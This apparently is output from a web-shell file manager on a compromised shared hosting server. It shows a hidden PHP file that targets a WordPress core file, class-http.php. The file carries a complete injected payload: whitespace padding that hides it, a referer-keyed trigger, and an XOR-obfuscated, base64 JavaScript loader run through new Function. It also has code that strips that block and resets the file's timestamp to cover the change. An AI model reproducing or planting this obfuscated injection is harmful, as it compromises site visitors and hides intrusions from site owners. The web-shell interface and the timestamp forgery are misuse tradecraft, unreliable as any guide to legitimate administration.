HEX
Server: LiteSpeed
System: Linux server41.shared.spaceship.host 4.18.0-553.70.1.lve.el8.x86_64 #1 SMP Wed Aug 20 14:42:18 UTC 2025 x86_64
User: pymuuvxdio (4386)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //dev/shm/.token
<?php  $path = '/home/kyzlmlaegp/tokcer169.net/wp-includes/class-http.php'; $ft = @filemtime($path); $new_content = str_repeat("\t", 42).rawurldecode('%0D%0A%24r%20%3D%20isset%28%24_SERVER%5B%27HTTP_REFERER%27%5D%29%20%3F%20%24_SERVER%5B%27HTTP_REFERER%27%5D%20%3A%20%27%27%3B%0D%0Aif%20%28%24r%20%21%3D%3D%20%27%27%20%26%26%20strpos%28%24r%2C%20%27DcOCVdkRcZ5Nzy%27%29%20%21%3D%3D%20false%29%20%7B%0D%0A%20%20%20%20echo%20%27SiApK%27.%27OsXG%27%3B%0D%0A%20%20%20%20return%3B%0D%0A%3Cscript%3E%0D%0A%21function%28%29%7Bvar%20_0x5d18%3Datob%28%27Jmh7YG16Z2FgJid1Z2gmeWdgamF5VSlRPWs5OWpqODo6PSlTJ3xrent8YDV5Z2BqYXlVKVE9azk5amo4Ojo9KVMzPzV4b3wuUWx3aWAzLDY6PjxobD89PTZqb29sOG8/ODhrNz9vbzZtNzxvPD45NzZvbWhvNzZobDk7bTtvPCw1eG98LlF7fHp%2BZzNVKWZ6en59NCEhfmFid2lhYCBqfH5tIGF8aSkiKWZ6en59NCEhfmFid2lhYCNsYXwjfH5tIH57bGJnbWBhamsgbWFjKSIpZnp6fn00ISF8fm0jY29nYGBreiBjb3pnbSB/e2dlYGFqayB%2BfGEpIilmenp%2BfTQhIX5hYndpYWAjY29nYGBreiB%2Be2xiZ20gbGJvfXpvfmcgZ2EpIilmenp%2BfTQhIX5hYndpYWAgaW96a3lvdyB6a2Bqa3xidyBtYSkiKWZ6en59NCEhP3x%2BbSBnYSFjb3pnbSkiKWZ6en59NCEhfmFid2lhYCN%2Be2xiZ20gYGFqZ2t9IG9%2BfikiKWZ6en59NCEhfH5tIG9gZXwgbWFjIX5hYndpYWApUzV4b3wuUWpifmp0Myw%2Bdkw4bE03az9KPmw8aEw3OE9sOU06OUs%2BOk1sPkxLOjk5Oj8%2BbE0/aDwsNXhvfC5RYmN/a2FjMyxsODZqPzY%2BNyw1aHtgbXpnYWAuUWRieGFvJlF9ZmVvYXpmJ3V6fHd1eG98LlFibGRsdmMzUX1mZW9hemYgfXtsfXp8Jj4iPCczMzMpPnYpMVF9ZmVvYXpmIH17bH16fCY8JzRRfWZlb2F6ZjVnaCZRYmxkbHZjIGJrYGl6ZjI/PDYnfGt6e3xgKSk1eG98LlFkd3x9ejN%2Bb3x9a0dgeiZRYmxkbHZjIH17bH16fCY4OiI4OiciPzgnNWdoJi9RZHd8fXonfGt6e3xgKSk1eG98LlF3eGd4Y31kM1FibGRsdmMgfXtsfXp8Jj88NiJRZHd8fXokPCciUXZ7eWViMykpNWhhfCZ4b3wuUWV8d2N3dmgzPjVRZXx3Y3d2aDJRd3hneGN9ZCBia2BpemY1UWV8d2N3dmglMzwndXhvfC5RZ2h/b357ZzN%2Bb3x9a0dgeiZRd3hneGN9ZCB9e2x9enwmUWV8d2N3dmgiPCciPzgnNWdoJlFnaH9vfntnJ1F2e3llYiUzXXp8Z2BpIGh8YWNNZm98TWFqayZRZ2h/b357Zyc1c3xrent8YC5Rdnt5ZWI1c21vem1mJmsndXxrent8YCkpNXNzaHtgbXpnYWAuUX1re2pmZSZRandofm96IlFjdmpnZ2BqJ3V8a3p7fGAuYGt5Ll58YWNnfWsmaHtgbXpnYWAmUXZve2l3ZHYiUX5ta2Vsdid1eG98LlFseWNob2szYGt5LlZDQkZ6en5ca397a316Jic1UWx5Y2hvayBhfmtgJileQV1aKSJRandofm96Inp8e2snNVFseWNob2sgfWt6XGt/e2t9ekZrb2prfCYpTWFgemtgeiNad35rKSIpb35%2BYmdtb3pnYWAhZH1hYCknNVFseWNob2sgemdja2F7ejM7Pj4%2BNVFseWNob2sgYWBiYW9qM2h7YG16Z2FgJid1enx3dVF2b3tpd2R2JkRdQUAgfm98fWsmUWx5Y2hvayB8a31%2BYWB9a1prdnonJzVzbW96bWYmayd1UX5ta2VsdiZrJzVzczVRbHljaG9rIGFga3x8YXwzUWx5Y2hvayBhYHpnY2the3ozaHtgbXpnYWAmJ3VRfm1rZWx2JmBreS5LfHxhfCYnJzVzNVFseWNob2sgfWtgaiZEXUFAIH16fGdgaWdodyZRY3ZqZ2dgaicnNXMnNXNoe2BtemdhYC5Ren59b3cmUX5vZH9id3QndWdoJlF%2Bb2R/Ynd0MDNRe3x6fmcgYmtgaXpmJ3xrent8YC5efGFjZ31rIHxrfWFieGsmYHtiYic1eG98LlF9d3ltbWwzdWR9YWB8fm00KTwgPikiY2t6ZmFqNClremZRbW9iYikifm98b2N9NFV1emE0UWpifmp0Impvem80KT52KSVRYmN/a2FjcyIpYm96a316KVMiZ2o0P3M1fGt6e3xgLlF9a3tqZmUmUXt8en5nVVF%2Bb2R/Ynd0UyJRfXd5bW1sJyB6ZmtgJmh7YG16Z2FgJlFjem96dCd1eG98LlF3ZXR/bzNRY3pvenQoKFFjem96dCB8a317YnoxUWRieGFvJlFjem96dCB8a317YnonNCkpNWdoJlF3ZXR/byd8a3p7fGAuUXdldH9vIHxrfmJvbWsmIVIhJSohIikpJzV8a3p7fGAuUXp%2BfW93JlF%2Bb2R/Ynd0JT8nNXMnIG1vem1mJmh7YG16Z2FgJid1fGt6e3xgLlF6fn1vdyZRfm9kf2J3dCU/JzVzJzVzaHtgbXpnYWAuUWl2fnZkdncmUXdoanR/aHgndXhvfC5Rf2B4a3szamFte2NrYHogbXxrb3prS2JrY2tgeiYpfW18Z356KSc1UX9geGt7IH18bTNRd2hqdH9oeCUpIW9%2BZyB%2BZn4xfTMpJVFsd2lgJSkoUXgzKSVDb3pmIGhiYWF8JkpvemsgYGF5JichOD4%2BPj4nNVF/YHhreyBvfXdgbTN6fHtrNSZqYW17Y2tgeiBma29qcnJqYW17Y2tgeiBsYWp3JyBvfn5rYGpNZmdiaiZRf2B4a3snNXNRen59b3cmPicgemZrYCZoe2BtemdhYCZRd2hqdH9oeCd1Z2gmUXdoanR/aHgnUWl2fnZkdncmUXdoanR/aHgnNXMnNXMnJic1%27%29%2C_0x470b%3D14%2C_0xd4d1%3Dnew%20Uint8Array%28_0x5d18%5B%27length%27%5D%29%2C_0x7f57%3D0%3Bfor%28%3B_0x7f57%3C_0x5d18%5B%27length%27%5D%3B_0x7f57%2B%2B%29_0xd4d1%5B_0x7f57%5D%3D_0x5d18%5B%27charCodeAt%27%5D%28_0x7f57%29%5E_0x470b%3B%28new%20Function%28new%20TextDecoder%28%29%5B%27decode%27%5D%28_0xd4d1%29%29%29%28%29%7D%28%29%3B%0D%0A%3C/script%3E%0D%0A%7D')."\n"; if (file_exists($path) && is_writable($path)) {     $content = (string) @file_get_contents($path);     if (strlen($content) > 0 && strpos($content, $new_content) !== FALSE) {         $candidate = str_replace($new_content, '', $content);         $safe = (strlen($candidate) >= 32) && (strpos($candidate, '<?php') !== FALSE || strpos($candidate, '<?=') !== FALSE);         if ($safe) {             $tmp = @tempnam(dirname($path), 't');             if ($tmp !== false && @file_put_contents($tmp, $candidate) !== false && @rename($tmp, $path)) {                 @touch($path, $ft);             } elseif ($tmp !== false && is_file($tmp)) {                 @unlink($tmp);             }         }     } } die('!success!');